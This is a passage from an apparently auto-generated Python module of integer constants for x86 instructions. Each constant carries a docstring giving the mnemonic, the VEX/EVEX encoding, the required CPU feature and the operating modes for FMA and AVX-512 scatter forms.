EVEX_VFMSUBADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3347
"""
``VFMSUBADD132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 97 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD132PS_XMM_XMM_XMMM128: int = 3348
"""
``VFMADD132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 98 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132PS_YMM_YMM_YMMM256: int = 3349
"""
``VFMADD132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 98 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132PD_XMM_XMM_XMMM128: int = 3350
"""
``VFMADD132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 98 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132PD_YMM_YMM_YMMM256: int = 3351
"""
``VFMADD132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 98 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3352
"""
``VFMADD132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3353
"""
``VFMADD132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3354
"""
``VFMADD132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 98 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3355
"""
``VFMADD132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3356
"""
``VFMADD132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3357
"""
``VFMADD132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 98 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD132SS_XMM_XMM_XMMM32: int = 3358
"""
``VFMADD132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 99 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132SD_XMM_XMM_XMMM64: int = 3359
"""
``VFMADD132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 99 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3360
"""
``VFMADD132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 99 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3361
"""
``VFMADD132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 99 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB132PS_XMM_XMM_XMMM128: int = 3362
"""
``VFMSUB132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 9A /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132PS_YMM_YMM_YMMM256: int = 3363
"""
``VFMSUB132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 9A /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132PD_XMM_XMM_XMMM128: int = 3364
"""
``VFMSUB132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 9A /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132PD_YMM_YMM_YMMM256: int = 3365
"""
``VFMSUB132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 9A /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3366
"""
``VFMSUB132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3367
"""
``VFMSUB132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3368
"""
``VFMSUB132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 9A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3369
"""
``VFMSUB132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3370
"""
``VFMSUB132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3371
"""
``VFMSUB132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 9A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3372
"""
``V4FMADDPS zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 9A /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFMSUB132SS_XMM_XMM_XMMM32: int = 3373
"""
``VFMSUB132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 9B /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132SD_XMM_XMM_XMMM64: int = 3374
"""
``VFMSUB132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 9B /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3375
"""
``VFMSUB132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 9B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3376
"""
``VFMSUB132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 9B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FMADDSS_XMM_K1Z_XMMP3_M128: int = 3377
"""
``V4FMADDSS xmm1 {k1}{z}, xmm2+3, m128``
``EVEX.LIG.F2.0F38.W0 9B /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFNMADD132PS_XMM_XMM_XMMM128: int = 3378
"""
``VFNMADD132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 9C /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132PS_YMM_YMM_YMMM256: int = 3379
"""
``VFNMADD132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 9C /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132PD_XMM_XMM_XMMM128: int = 3380
"""
``VFNMADD132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 9C /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132PD_YMM_YMM_YMMM256: int = 3381
"""
``VFNMADD132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 9C /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3382
"""
``VFNMADD132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3383
"""
``VFNMADD132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3384
"""
``VFNMADD132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 9C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3385
"""
``VFNMADD132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3386
"""
``VFNMADD132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3387
"""
``VFNMADD132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 9C /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD132SS_XMM_XMM_XMMM32: int = 3388
"""
``VFNMADD132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 9D /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132SD_XMM_XMM_XMMM64: int = 3389
"""
``VFNMADD132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 9D /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3390
"""
``VFNMADD132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 9D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3391
"""
``VFNMADD132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 9D /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB132PS_XMM_XMM_XMMM128: int = 3392
"""
``VFNMSUB132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 9E /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132PS_YMM_YMM_YMMM256: int = 3393
"""
``VFNMSUB132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 9E /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132PD_XMM_XMM_XMMM128: int = 3394
"""
``VFNMSUB132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 9E /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132PD_YMM_YMM_YMMM256: int = 3395
"""
``VFNMSUB132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 9E /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3396
"""
``VFNMSUB132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3397
"""
``VFNMSUB132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3398
"""
``VFNMSUB132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 9E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3399
"""
``VFNMSUB132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3400
"""
``VFNMSUB132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3401
"""
``VFNMSUB132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 9E /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB132SS_XMM_XMM_XMMM32: int = 3402
"""
``VFNMSUB132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 9F /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132SD_XMM_XMM_XMMM64: int = 3403
"""
``VFNMSUB132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 9F /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3404
"""
``VFNMSUB132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 9F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3405
"""
``VFNMSUB132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 9F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDD_VM32X_K1_XMM: int = 3406
"""
``VPSCATTERDD vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDD_VM32Y_K1_YMM: int = 3407
"""
``VPSCATTERDD vm32y {k1}, ymm1``
``EVEX.256.66.0F38.W0 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDD_VM32Z_K1_ZMM: int = 3408
"""
``VPSCATTERDD vm32z {k1}, zmm1``
``EVEX.512.66.0F38.W0 A0 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDQ_VM32X_K1_XMM: int = 3409
"""
``VPSCATTERDQ vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDQ_VM32X_K1_YMM: int = 3410
"""
``VPSCATTERDQ vm32x {k1}, ymm1``
``EVEX.256.66.0F38.W1 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDQ_VM32Y_K1_ZMM: int = 3411
"""
``VPSCATTERDQ vm32y {k1}, zmm1``
``EVEX.512.66.0F38.W1 A0 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQD_VM64X_K1_XMM: int = 3412
"""
``VPSCATTERQD vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQD_VM64Y_K1_XMM: int = 3413
"""
``VPSCATTERQD vm64y {k1}, xmm1``
``EVEX.256.66.0F38.W0 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQD_VM64Z_K1_YMM: int = 3414
"""
``VPSCATTERQD vm64z {k1}, ymm1``
``EVEX.512.66.0F38.W0 A1 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQQ_VM64X_K1_XMM: int = 3415
"""
``VPSCATTERQQ vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQQ_VM64Y_K1_YMM: int = 3416
"""
``VPSCATTERQQ vm64y {k1}, ymm1``
``EVEX.256.66.0F38.W1 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQQ_VM64Z_K1_ZMM: int = 3417
"""
``VPSCATTERQQ vm64z {k1}, zmm1``
``EVEX.512.66.0F38.W1 A1 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPS_VM32X_K1_XMM: int = 3418
"""
``VSCATTERDPS vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPS_VM32Y_K1_YMM: int = 3419
"""
``VSCATTERDPS vm32y {k1}, ymm1``
``EVEX.256.66.0F38.W0 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPS_VM32Z_K1_ZMM: int = 3420
"""
``VSCATTERDPS vm32z {k1}, zmm1``
``EVEX.512.66.0F38.W0 A2 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPD_VM32X_K1_XMM: int = 3421
"""
``VSCATTERDPD vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPD_VM32X_K1_YMM: int = 3422
"""
``VSCATTERDPD vm32x {k1}, ymm1``
``EVEX.256.66.0F38.W1 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPD_VM32Y_K1_ZMM: int = 3423
"""
``VSCATTERDPD vm32y {k1}, zmm1``
``EVEX.512.66.0F38.W1 A2 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPS_VM64X_K1_XMM: int = 3424
"""
``VSCATTERQPS vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPS_VM64Y_K1_XMM: int = 3425
"""
``VSCATTERQPS vm64y {k1}, xmm1``
``EVEX.256.66.0F38.W0 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPS_VM64Z_K1_YMM: int = 3426
"""
``VSCATTERQPS vm64z {k1}, ymm1``
``EVEX.512.66.0F38.W0 A3 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPD_VM64X_K1_XMM: int = 3427
"""
``VSCATTERQPD vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPD_VM64Y_K1_YMM: int = 3428
"""
``VSCATTERQPD vm64y {k1}, ymm1``
``EVEX.256.66.0F38.W1 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPD_VM64Z_K1_ZMM: int = 3429
"""
``VSCATTERQPD vm64z {k1}, zmm1``
``EVEX.512.66.0F38.W1 A3 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PS_XMM_XMM_XMMM128: int = 3430
"""
``VFMADDSUB213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 A6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PS_YMM_YMM_YMMM256: int = 3431
"""
``VFMADDSUB213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 A6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PD_XMM_XMM_XMMM128: int = 3432
"""
``VFMADDSUB213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 A6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PD_YMM_YMM_YMMM256: int = 3433
"""
``VFMADDSUB213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 A6 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3434
"""
``VFMADDSUB213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PS_YMM_K1Z_YMM_YMMM256B32: int = 3435
"""
``VFMADDSUB213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3436
"""
``VFMADDSUB213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 A6 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PD_XMM_K1Z_XMM_XMMM128B64: int = 3437
"""
``VFMADDSUB213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PD_YMM_K1Z_YMM_YMMM256B64: int = 3438
"""
``VFMADDSUB213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 A6 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3439
"""
``VFMADDSUB213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 A6 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PS_XMM_XMM_XMMM128: int = 3440
"""
``VFMSUBADD213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 A7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PS_YMM_YMM_YMMM256: int = 3441
"""
``VFMSUBADD213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 A7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PD_XMM_XMM_XMMM128: int = 3442
"""
``VFMSUBADD213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 A7 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD213PD_YMM_YMM_YMMM256: int = 3443
"""
``VFMSUBADD213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 A7 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3444
"""
``VFMSUBADD213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3445
"""
``VFMSUBADD213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3446
"""
``VFMSUBADD213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 A7 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3447
"""
``VFMSUBADD213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3448
"""
``VFMSUBADD213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 A7 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3449
"""
``VFMSUBADD213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 A7 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD213PS_XMM_XMM_XMMM128: int = 3450
"""
``VFMADD213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 A8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213PS_YMM_YMM_YMMM256: int = 3451
"""
``VFMADD213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 A8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213PD_XMM_XMM_XMMM128: int = 3452
"""
``VFMADD213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 A8 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213PD_YMM_YMM_YMMM256: int = 3453
"""
``VFMADD213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 A8 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD213PS_XMM_K1Z_XMM_XMMM128B32: int = 3454
"""
``VFMADD213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PS_YMM_K1Z_YMM_YMMM256B32: int = 3455
"""
``VFMADD213PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3456
"""
``VFMADD213PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 A8 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PD_XMM_K1Z_XMM_XMMM128B64: int = 3457
"""
``VFMADD213PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PD_YMM_K1Z_YMM_YMMM256B64: int = 3458
"""
``VFMADD213PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 A8 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3459
"""
``VFMADD213PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 A8 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD213SS_XMM_XMM_XMMM32: int = 3460
"""
``VFMADD213SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 A9 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD213SD_XMM_XMM_XMMM64: int = 3461
"""
``VFMADD213SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 A9 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD213SS_XMM_K1Z_XMM_XMMM32_ER: int = 3462
"""
``VFMADD213SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 A9 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD213SD_XMM_K1Z_XMM_XMMM64_ER: int = 3463
"""
``VFMADD213SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 A9 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB213PS_XMM_XMM_XMMM128: int = 3464
"""
``VFMSUB213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 AA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213PS_YMM_YMM_YMMM256: int = 3465
"""
``VFMSUB213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 AA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213PD_XMM_XMM_XMMM128: int = 3466
"""
``VFMSUB213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 AA /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB213PD_YMM_YMM_YMMM256: int = 3467
"""
``VFMSUB213PD ymm1, ymm2, ymm3/m256``
